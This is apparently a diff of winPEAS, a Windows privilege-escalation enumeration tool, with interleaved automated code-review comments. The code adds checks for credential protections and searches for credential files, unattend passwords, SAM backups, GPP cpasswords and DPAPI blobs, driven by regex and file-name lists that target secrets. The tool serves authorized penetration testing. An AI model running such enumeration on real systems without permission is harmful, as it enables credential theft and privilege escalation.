Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
{
{ "CredFile", file },
{ "Description", desc },
@ -1472,6 +1488,7 @@ namespace winPEAS
{ "Modified", String.Format("{0}", lastModified) },
{ "Size", String.Format("{0}", size) },
});
}
}
}
}
@ -1519,35 +1536,39 @@ namespace winPEAS
else
{
string userName = Environment.GetEnvironmentVariable("USERNAME");
string userCredFilePath = String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
List<string> userCredFilePaths = new List<string>();
userCredFilePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userCredFilePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
if (System.IO.Directory.Exists(userCredFilePath))
foreach (string userCredFilePath in userCredFilePaths)
{
string[] files = Directory.GetFiles(userCredFilePath);
foreach (string file in files)
if (System.IO.Directory.Exists(userCredFilePath))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
string[] files = Directory.GetFiles(userCredFilePath);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
{
{ "CredFile", file },
{ "Description", desc },
@ -1556,6 +1577,7 @@ namespace winPEAS
{ "Modified", String.Format("{0}", lastModified) },
{ "Size", String.Format("{0}", size) },
});
}
}
}
}
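Review bot: In the hunk at L1970–L2014 the per-user loop over `dir` now builds its DPAPI paths from `USERPROFILE` (L1982–L1983) instead of `dir`, which the removed line L1974 used, so when run with high integrity the current user's Protect folders are listed once per profile directory and the other users' master-key folders are never inspected; change both lines to `String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", dir)` and `String.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", dir)`. The credential-file parser moved into the loops at L2081–L2111 and L2150–L2174 copies from fixed offsets (36, 56, 60) and `descLen - 4` bytes out of `credentialArray` without checking the file length, so a short or truncated file throws (and a negative or oversized `descLen` fails at `new byte[descLen]`), ending the whole enumeration unless a catch outside the hunk handles it; a `credentialArray.Length` guard and a `descLen` bounds check before the copies would keep one bad file from hiding the rest. The enclosing method bodies start and end outside these hunks.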


@ -392,10 +392,11 @@ namespace winPEAS
return results;
}
public static string PermInt2Str(int current_perm, bool only_write_or_equivalent = false)
public static string PermInt2Str(int current_perm, bool only_write_or_equivalent = false, bool is_service=false)
{
Dictionary<string, int> interesting_perms = new Dictionary<string, int>()
{
// This isn't an exhaustive list of possible permissions. Just the interesting ones.
{ "AllAccess", 0xf01ff},
{ "GenericAll", 0x10000000},
{ "FullControl", (int)FileSystemRights.FullControl },
@ -418,16 +419,22 @@ namespace winPEAS
{
{ "AllAccess", 0xf01ff},
{ "GenericAll", 0x10000000},
{ "FullControl", (int)FileSystemRights.FullControl },
{ "TakeOwnership", (int)FileSystemRights.TakeOwnership },
{ "FullControl", (int)FileSystemRights.FullControl }, //0x1f01ff
{ "TakeOwnership", (int)FileSystemRights.TakeOwnership }, //0x80000
{ "GenericWrite", 0x40000000 },
{ "WriteData/CreateFiles", (int)FileSystemRights.WriteData },
{ "Modify", (int)FileSystemRights.Modify },
{ "Write", (int)FileSystemRights.Write },
{ "ChangePermissions", (int)FileSystemRights.ChangePermissions },
{ "WriteData/CreateFiles", (int)FileSystemRights.WriteData }, //0x2
{ "Modify", (int)FileSystemRights.Modify }, //0x301bf
{ "Write", (int)FileSystemRights.Write }, //0x116
{ "ChangePermissions", (int)FileSystemRights.ChangePermissions }, //0x40000
};
}
if (is_service)
{
interesting_perms["Start"] = 0x00000010;
interesting_perms["Stop"] = 0x00000020;
}
try
{
foreach (KeyValuePair<string, int> entry in interesting_perms)
@ -444,12 +451,16 @@ namespace winPEAS
}
//From https://stackoverflow.com/questions/929276/how-to-recursively-list-all-the-files-in-a-directory-in-c
public static Dictionary<string, string> GecRecursivePrivs(string path)
public static Dictionary<string, string> GetRecursivePrivs(string path, int cont=0)
{
/*string root = @Path.GetPathRoot(Environment.SystemDirectory) + path;
var dirs = from dir in Directory.EnumerateDirectories(root) select dir;
return dirs.ToList();*/
Dictionary<string, string> results = new Dictionary<string, string>();
int max_dir_recurse = 130;
if (cont > max_dir_recurse)
return results; //"Limit" for apps with hundreds of thousands of folders
results[path] = ""; //If you cant open, then there are no privileges for you (and the try will explode)
try
{
@ -462,7 +473,8 @@ namespace winPEAS
{
results[f] = String.Join(", ", GetPermissionsFile(f, Program.currentUserSIDs));
}
results.Concat(GecRecursivePrivs(d)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
cont += 1;
results.Concat(GetRecursivePrivs(d, cont)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
}
}
}
@ -604,15 +616,18 @@ namespace winPEAS
// search every pattern in this directory's files
foreach (string pattern in patterns.Split(';'))
{
Beaprint.AnsiPrint(String.Join("\n", Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly).Where(filepath => !filepath.Contains(".dll"))), color);
Beaprint.AnsiPrint(" "+String.Join("\n ", Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly).Where(filepath => !filepath.Contains(".dll"))), color);
}
if (!Program.search_fast)
Thread.Sleep(Program.search_time);
// go recurse in all sub-directories
foreach (var directory in Directory.GetDirectories(path))
FindFiles(directory, patterns, color);
foreach (string directory in Directory.GetDirectories(path))
{
if (!directory.Contains("AppData"))
FindFiles(directory, patterns, color);
}
}
catch (UnauthorizedAccessException) { }
catch (PathTooLongException) { }
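Review bot: At L2251 the merged result of the recursive call is discarded — `results.Concat(GetRecursivePrivs(d, cont)).ToDictionary(...)` builds a new dictionary and throws it away, so permissions of anything below the first directory level never reach the returned `results` (the renamed call keeps the defect of the old L2249); replace it with `foreach (var kvp in GetRecursivePrivs(d, cont)) results[kvp.Key] = kvp.Value;`. The `cont` guard at L2239–L2241 is advanced once per sibling directory (L2250) and handed to the child, so it is neither a depth limit nor a total-directory limit; if the intent is to cap the walk on very large trees, a depth parameter incremented once per level or a shared visited counter would be clearer, and `max_dir_recurse` belongs as a `const`. The `!directory.Contains("AppData")` skip at L2269 silently drops any pattern a caller expects to find under a user's AppData and is a substring test, so it also prunes any path containing that text elsewhere; a comment stating the intent (`// skip per-user AppData trees: large and not expected to hold these files`) would help the next reader. PermInt2Str's and GetRecursivePrivs' bodies continue outside these hunks.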


@ -13,8 +13,7 @@ namespace winPEAS
public static string advisory = "winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.";
public static bool banner = true;
public static bool search_fast = false;
public static int search_time = 150;
static bool is_fast = false;
public static int search_time = 50;
static bool exec_cmd = false;
public static bool notcolor = false;
@ -33,8 +32,9 @@ namespace winPEAS
static string print_credStrings_limited = "[pP][aA][sS][sS][wW][a-zA-Z0-9_-]*|[pP][wW][dD][a-zA-Z0-9_-]*|[nN][aA][mM][eE]|[lL][oO][gG][iI][nN]|[cC][oO][nN][tT][rR][aA][sS][eE][a-zA-Z0-9_-]*|[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL][a-zA-Z0-9_-]*|[aA][pP][iI]|[tT][oO][kK][eE][nN]|[sS][eE][sS][sS][a-zA-Z0-9_-]*";
static string print_credStrings = print_credStrings_limited + "|[uU][sS][eE][rR][a-zA-Z0-9_-]*";
static List<string> credStringsRegex = new List<string> { "PASSW[a-zA-Z0-9_-]*=", "PWD[a-zA-Z0-9_-]*=", "USER[a-zA-Z0-9_-]*=", "NAME=", "&LOGIN", "=LOGIN", "CONTRASEÑA[a-zA-Z0-9_-]*=", "CREDENTIAL[a-zA-Z0-9_-]*=", "API_KEY", "TOKEN" };
static string patterns_file_creds = @"RDCMan.settings;*.rdg;*_history;.sudo_as_admin_successful;.profile;*bashrc;httpd.conf;*.plan;.htpasswd;.git-credentials;*.rhosts;hosts.equiv;Dockerfile;docker-compose.yml;credentials;credentials.db;access_tokens.db;accessTokens.json;legacy_credentials;azureProfile.json;appcmd.exe;scclient.exe;unattend.txt;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.der$;*.csr$;*.cer$;known_hosts;id_rsa;id_dsa;*.ovpn;anaconda-ks.cfg;hostapd.conf;rsyncd.conf;cesi.conf;supervisord.conf;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;unattend.xml;unattended.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;php.ini;https.conf;https-xampp.conf;httpd.conf;my.ini;my.cnf;access.log;error.log;server.xml;SiteList.xml;ConsoleHost_history.txt;setupinfo;setupinfo.bak";
static string patterns_file_creds_color = "RDCMan.settings|.rdg|_history|.sudo_as_admin_successful|.profile|bashrc|httpd.conf|.plan|.htpasswd|.git-credentials|.rhosts|hosts.equiv|Dockerfile|docker-compose.yml|credentials|credentials.db|access_tokens.db|accessTokens.json|legacy_credentials|azureProfile.json|appcmd.exe|scclient.exe|unattend.txt|access.log|error.log|credential|password|.gpg|.pgp|config.php|elasticsearch|kibana.|.p12|.der|.csr|.crt|.cer|.pem|known_hosts|id_rsa|id_dsa|.ovpn|anaconda-ks.cfg|hostapd.conf|rsyncd.conf|cesi.conf|supervisord.conf|tomcat-users.xml|web.config|.kdbx|.key|KeePass.config|ntds.dir|Ntds.dit|sam|system|SAM|SYSTEM|FreeSSHDservice.ini|sysprep.inf|sysprep.xml|unattend.xml|unattended.xml|vnc|groups.xml|services.xml|scheduledtasks.xml|printers.xml|drives.xml|datasources.xml|php.ini|https.conf|https-xampp.conf|httpd.conf|my.ini|my.cnf|access.log|error.log|server.xml|SiteList.xml|setupinfo";
static string patterns_file_creds = @"RDCMan.settings;*.rdg;*_history*;httpd.conf;.htpasswd;.gitconfig;.git-credentials;Dockerfile;docker-compose.yml;access_tokens.db;accessTokens.json;azureProfile.json;appcmd.exe;scclient.exe;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.cer$;known_hosts;*id_rsa*;*id_dsa*;*.ovpn;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;php.ini;https.conf;https-xampp.conf;my.ini;my.cnf;access.log;error.log;server.xml;ConsoleHost_history.txt";
static string complete_patterns_file_creds = ";unattend.txt;*.der$;*.csr$;unattend.xml;unattended.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;setupinfo;setupinfo.bak";
static string patterns_file_creds_color = @"RDCMan.settings|.rdg|_history|httpd.conf|.htpasswd|.gitconfig|.git-credentials|Dockerfile|docker-compose.ymlaccess_tokens.db|accessTokens.json|azureProfile.json|appcmd.exe|scclient.exe|unattend.txt|access.log|error.log|credential|password|.gpg|.pgp|config.php|elasticsearch|kibana.|.p12|\.der|.csr|.crt|.cer|.pem|known_hosts|id_rsa|id_dsa|.ovpn|tomcat-users.xml|web.config|.kdbx|.key|KeePass.config|ntds.dir|Ntds.dit|sam|system|SAM|SYSTEM|FreeSSHDservice.ini|sysprep.inf|sysprep.xml|unattend.xml|unattended.xml|vnc|groups.xml|services.xml|scheduledtasks.xml|printers.xml|drives.xml|datasources.xml|php.ini|https.conf|https-xampp.conf|my.ini|my.cnf|access.log|error.log|server.xml|setupinfo";
// Create Dynamic blacklists
static string currentUserName = Environment.UserName;
@ -144,7 +144,7 @@ namespace winPEAS
try
{
if (MyUtils.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && MyUtils.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1'");
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
}
catch(Exception ex)
{
@ -189,7 +189,7 @@ namespace winPEAS
{
Beaprint.MainPrint("PowerShell Settings", "");
Dictionary<string, string> PSs = SystemInfo.GetPowerShellSettings();
Beaprint.DictPrint(PSs, true);
Beaprint.DictPrint(PSs, false);
}
catch (Exception ex)
{
@ -232,7 +232,7 @@ namespace winPEAS
try
{
Beaprint.MainPrint("LAPS Settings", "T1012");
Beaprint.LinkPrint("", "If installed, local administrator password change frequently in domain-joined boxes and is restricted by ACL");
Beaprint.LinkPrint("", "If installed, local administrator password is changed frequently and is restricted by ACL");
Dictionary<string, string> lapsDict = SystemInfo.GetLapsSettings();
Dictionary<string, string> colorsSI = new Dictionary<string, string>()
{
@ -246,6 +246,62 @@ namespace winPEAS
}
}
void PrintWdigest()
{
Beaprint.MainPrint("Wdigest", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest", "If enabled, plain-text crds could be stored in LSASS");
string useLogonCredential = MyUtils.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest", "UseLogonCredential");
if (useLogonCredential == "1")
Beaprint.BadPrint(" Wdigest is active");
else
Beaprint.GoodPrint(" Wdigest is not enabled");
}
void PrintLSAProtection()
{
Beaprint.MainPrint("LSA Protection", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection", "If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key)");
string useLogonCredential = MyUtils.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\LSA", "RunAsPPL");
if (useLogonCredential == "1")
Beaprint.GoodPrint(" LSA Protection is active");
else
Beaprint.BadPrint(" LSA Protection is not enabled");
}
void PrintCredentialGuard()
{
Beaprint.MainPrint("Credentials Guard", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard", "If enabled, a driver is needed to read LSASS memory");
string lsaCfgFlags = MyUtils.GetRegValue("HKLM", @"System\CurrentControlSet\Control\LSA", "LsaCfgFlags");
if (lsaCfgFlags == "1")
{
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
Beaprint.GoodPrint(" CredentialGuard is active with UEFI lock");
}
else if (lsaCfgFlags == "2")
{
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
Beaprint.GoodPrint(" CredentialGuard is active without UEFI lock");
}
else
Beaprint.BadPrint(" CredentialGuard is not enabled");
}
void PrintCachedCreds()
{
Beaprint.MainPrint("Cached Creds", "");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = MyUtils.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
if (!String.IsNullOrEmpty(cachedlogonscount))
{
int clc = Int16.Parse(cachedlogonscount);
if (clc > 0)
Beaprint.BadPrint(" cachedlogonscount is "+ cachedlogonscount);
else
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
}
void PrintUserEV()
{
try
@ -401,6 +457,10 @@ namespace winPEAS
PrintAuditInfo();
PrintWEFInfo();
PrintLAPSInfo();
PrintWdigest();
PrintLSAProtection();
PrintCredentialGuard();
PrintCachedCreds();
PrintUserEV();
PrintSystemEV();
PrintInetInfo();
@ -577,7 +637,7 @@ namespace winPEAS
{
if (!ban)
{
Beaprint.BadPrint("Some AutoLogon credentials were found!!");
Beaprint.BadPrint(" Some AutoLogon credentials were found!!");
ban = true;
}
Beaprint.AnsiPrint(String.Format(" {0,-30}: {1}", entry.Key, entry.Value), colorsU());
@ -740,7 +800,7 @@ namespace winPEAS
try
{
Beaprint.MainPrint("Interesting Services -non Microsoft-", "T1007");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services", "Check if you can overwrite some service binary or perform a DLL hijacking, also cehck for unquoted paths");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services", "Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths");
List<Dictionary<string, string>> services_info = ServicesInfo.GetNonstandardServices();
@ -774,7 +834,12 @@ namespace winPEAS
if (no_quotes_and_space)
formString += " - {7}";
if (mod_services.ContainsKey(service_info["Name"]))
formString += "\n YOU CAN MODIFY THIS SERVICE: "+ mod_services[service_info["Name"]];
{
if (mod_services[service_info["Name"]] == "Start")
formString += "\n You can START this service";
else
formString += "\n YOU CAN MODIFY THIS SERVICE: " + mod_services[service_info["Name"]];
}
if (file_rights.Count > 0)
formString += "\n File Permissions: {8}";
if (dir_rights.Count > 0)
@ -789,6 +854,7 @@ namespace winPEAS
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
{ "No quotes and Space detected", Beaprint.ansi_color_bad },
{ "YOU CAN MODIFY THIS SERVICE:.*", Beaprint.ansi_color_bad },
{ " START ", Beaprint.ansi_color_bad },
{ service_info["PathName"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+"), (file_rights.Count > 0 || dir_rights.Count > 0 || no_quotes_and_space) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
};
@ -926,9 +992,9 @@ namespace winPEAS
{
try
{
Beaprint.MainPrint("Installed Applications --Via Program Files--", "T1083&T1012&T1010&T1518");
Beaprint.MainPrint("Installed Applications --Via Program Files/Uninstall registry--", "T1083&T1012&T1010&T1518");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software", "Check if you can modify installed software");
Dictionary<string, Dictionary<string, string>> InstalledAppsPerms = ApplicationInfo.GetInstalledAppsPerms();
SortedDictionary<string, Dictionary<string, string>> InstalledAppsPerms = ApplicationInfo.GetInstalledAppsPerms();
string format = " ==> {0} ({1})";
foreach (KeyValuePair<string, Dictionary<string, string>> app in InstalledAppsPerms)
{
@ -957,13 +1023,13 @@ namespace winPEAS
}
System.Console.WriteLine();
Beaprint.MainPrint("Installed Applications --Via Registry--", "T1083&T1012&T1010");
/*Beaprint.MainPrint("Installed Applications --Via Registry--", "T1083&T1012&T1010");
Dictionary<string, string> colorsA = new Dictionary<string, string>()
{
{ goodSoft, Beaprint.ansi_color_good }
};
Beaprint.ListPrint(ApplicationInfo.GetAppsRegistry(), colorsA);
Beaprint.ListPrint(ApplicationInfo.GetAppsRegistry(), colorsA);*/
}
catch
{
@ -1163,7 +1229,11 @@ namespace winPEAS
foreach (List<string> conn in conns)
{
if (conn[0].Contains("UDP") && conn[1].Contains("0.0.0.0:") && (conn[1].Split(':')[1].Length > 4))
continue;
continue; //Delete useless UDP listening ports
if (conn[0].Contains("UDP") && conn[1].Contains("[::]:") && (conn[1].Split(']')[1].Length > 4))
continue; //Delete useless UDP listening ports
Beaprint.AnsiPrint(String.Format(" {0,-10}{1,-23}{2,-23}{3}", conn[0], conn[1], conn[2], conn[3]), colorsN);
}
}
@ -1747,7 +1817,7 @@ namespace winPEAS
/////////////////////////////////////////////////
/////////////// INTERESTING FILES ///////////////
/////////////////////////////////////////////////
private static void PrintInterestingFiles(bool is_fast)
private static void PrintInterestingFiles()
{
void PrintPuttySess()
{
@ -1833,12 +1903,89 @@ namespace winPEAS
}
}
void PrintUnattendFiles()
{
try
{
Beaprint.MainPrint("Unnattend Files", "");
//Beaprint.LinkPrint("");
List<string> unattended_files = InterestingFiles.GetUnattendedInstallFiles();
foreach (string path in unattended_files)
{
List<string> pwds = InterestingFiles.ExtractUnattenededPwd(path);
Beaprint.BadPrint(" "+path);
System.Console.WriteLine(String.Join("\n", pwds));
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintSAMBackups()
{
try
{
Beaprint.MainPrint("Looking for common SAM & SYSTEM backups", "");
List<string> sam_files = InterestingFiles.GetSAMBackups();
foreach (string path in sam_files)
Beaprint.BadPrint(" " + path);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintMcAffeSitelistFiles()
{
try
{
Beaprint.MainPrint("Looking for McAfee Sitelist.xml Files", "");
List<string> sam_files = InterestingFiles.GetMcAfeeSitelistFiles();
foreach (string path in sam_files)
Beaprint.BadPrint(" " + path);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintCachedGPPPassword()
{
try
{
Beaprint.MainPrint("Cached GPP Passwords", "");
Dictionary<string, Dictionary<string, string>> gpp_passwords = InterestingFiles.GetCachedGPPPassword();
Dictionary<string, string> gppColors = new Dictionary<string, string>()
{
{ "cpassword.*", Beaprint.ansi_color_bad },
};
foreach (KeyValuePair<string, Dictionary<string, string>> entry in gpp_passwords)
{
Beaprint.BadPrint(" Found "+ entry.Key);
Beaprint.DictPrint(entry.Value, gppColors, true);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format("{0}", ex));
}
}
void PrintPossCredsRegs()
{
try
{
string[] pass_reg_hkcu = new string[] { @"Software\ORL\WinVNC3\Password", @"Software\TightVNC\Server", @"Software\SimonTatham\PuTTY\Sessions" };
string[] pass_reg_hklm = new string[] { @"SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon", @"SYSTEM\CurrentControlSet\Services\SNMP" };
string[] pass_reg_hklm = new string[] { @"SYSTEM\CurrentControlSet\Services\SNMP" };
Beaprint.MainPrint("Looking for possible regs with creds", "T1012&T1214");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry");
@ -1931,7 +2078,7 @@ namespace winPEAS
}
}
void PrintPossCredsFiles()
void PrintUsersInterestingFiles()
{
try
{
@ -1940,9 +2087,9 @@ namespace winPEAS
{ patterns_file_creds_color, Beaprint.ansi_color_bad },
};
Beaprint.MainPrint("Looking for possible known files that can contain creds", "T1083&T1081");
Beaprint.MainPrint("Searching known files that can contain creds in home", "T1083&T1081");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files");
string searchPath = String.Format("{0}\\", Environment.GetEnvironmentVariable("SystemDrive"));
string searchPath = Environment.GetEnvironmentVariable("USERPROFILE");
MyUtils.FindFiles(searchPath, patterns_file_creds, colorF);
}
catch (Exception ex)
@ -1971,9 +2118,18 @@ namespace winPEAS
{
Beaprint.MainPrint("Recent files --limit 70--", "T1083&T1081");
List<Dictionary<string, string>> rec_files = KnownFileCredsInfo.GetRecentFiles();
Dictionary<string, string> colorF = new Dictionary<string, string>()
{
{ patterns_file_creds_color, Beaprint.ansi_color_bad },
};
if (rec_files.Count != 0)
Beaprint.DictPrint(rec_files.GetRange(0, rec_files.Count <= 70 ? rec_files.Count : 70), false);
{
foreach (Dictionary<string, string> rec_f in rec_files.GetRange(0, rec_files.Count <= 70 ? rec_files.Count : 70))
Beaprint.AnsiPrint(" " + rec_f["Target"] + "(" + rec_f["Accessed"] + ")", colorF);
}
else
Beaprint.NotFoundPrint();
}
@ -1989,15 +2145,16 @@ namespace winPEAS
PrintPuttySSH();
PrintSSHKeysReg();
PrintCloudCreds();
PrintUnattendFiles();
PrintSAMBackups();
PrintMcAffeSitelistFiles();
PrintCachedGPPPassword();
PrintPossCredsRegs();
PrintUserCredsFiles();
PrintRecycleBin();
if (!is_fast)
{
PrintPossCredsFiles();
PrintUsersDocsKeys();
}
PrintRecentFiles();
PrintUsersInterestingFiles();
PrintUsersDocsKeys();
PrintRecentFiles();
}
@ -2021,9 +2178,6 @@ namespace winPEAS
bool check_if = false;
foreach (string arg in args)
{
if (string.Equals(arg, "fast", StringComparison.CurrentCultureIgnoreCase))
is_fast = true;
if (string.Equals(arg, "cmd", StringComparison.CurrentCultureIgnoreCase))
exec_cmd = true;
@ -2033,6 +2187,9 @@ namespace winPEAS
if (string.Equals(arg, "quiet", StringComparison.CurrentCultureIgnoreCase))
banner = false;
if (string.Equals(arg, "searchall", StringComparison.CurrentCultureIgnoreCase))
patterns_file_creds = patterns_file_creds + complete_patterns_file_creds;
if (string.Equals(arg, "searchfast", StringComparison.CurrentCultureIgnoreCase))
search_fast = false;
@ -2141,7 +2298,7 @@ namespace winPEAS
if (check_bi || check_all)
PrintBrowserInfo();
if (check_if || check_all)
PrintInterestingFiles(is_fast);
PrintInterestingFiles();
/*
* Wifi (passwords?)
@ -2151,7 +2308,7 @@ namespace winPEAS
* List Drivers ==> but how do I know if a driver is malicious?
*/
System.Console.ReadLine(); //For debugging
//System.Console.ReadLine(); //For debugging
}
}
}


@ -207,7 +207,7 @@ namespace winPEAS
RawAcl racl = rsd.DiscretionaryAcl;
DiscretionaryAcl dacl = new DiscretionaryAcl(false, false, racl);
string permissions = "";
List<string> permissions = new List<string>();
foreach (System.Security.AccessControl.CommonAce ace in dacl)
{
@ -215,14 +215,18 @@ namespace winPEAS
{
int serviceRights = ace.AccessMask;
string current_perm_str = MyUtils.PermInt2Str(serviceRights, true);
if (!String.IsNullOrEmpty(current_perm_str))
permissions += current_perm_str;
string current_perm_str = MyUtils.PermInt2Str(serviceRights, true, true);
if (!String.IsNullOrEmpty(current_perm_str) && !permissions.Contains(current_perm_str))
permissions.Add(current_perm_str);
}
}
if (!String.IsNullOrEmpty(permissions))
results.Add(sc.ServiceName, permissions);
if (permissions.Count > 0)
{
string perms = String.Join(", ", permissions);
if (perms.Replace("Start", "").Replace("Stop","").Length > 3) //Check if any other permissions appart from Start and Stop
results.Add(sc.ServiceName, perms);
}
}
catch (Exception ex)
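Review bot: The `perms.Replace("Start", "").Replace("Stop","").Length > 3` test in the second hunk is an indirect way to ask whether any right other than Start/Stop was collected: it measures leftover separators and would also strip those substrings out of any other permission name that happens to contain them. Since `permissions` is already a list of distinct strings, the intent can be stated directly, e.g. `if (permissions.Any(p => p != "Start" && p != "Stop"))` (or an equivalent foreach if System.Linq is not imported in this file). As written, a service whose only right is Start is never added to `results`, so the `mod_services[service_info["Name"]] == "Start"` branch visible in the Program.cs section above appears unreachable; worth confirming which behaviour is intended. The enclosing method starts and ends outside the hunk.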


@ -227,6 +227,9 @@ namespace winPEAS
results["Scriptblock Logging Settings"] = "";
Dictionary<string, object> transcriptionSettings = MyUtils.GetRegValues("HKLM", "SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription");
if ((transcriptionSettings == null) || (transcriptionSettings.Count == 0))
transcriptionSettings = MyUtils.GetRegValues("HKLM", @"HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription");
if ((transcriptionSettings != null) && (transcriptionSettings.Count != 0))
{
foreach (KeyValuePair<string, object> kvp in transcriptionSettings)
@ -236,6 +239,9 @@ namespace winPEAS
}
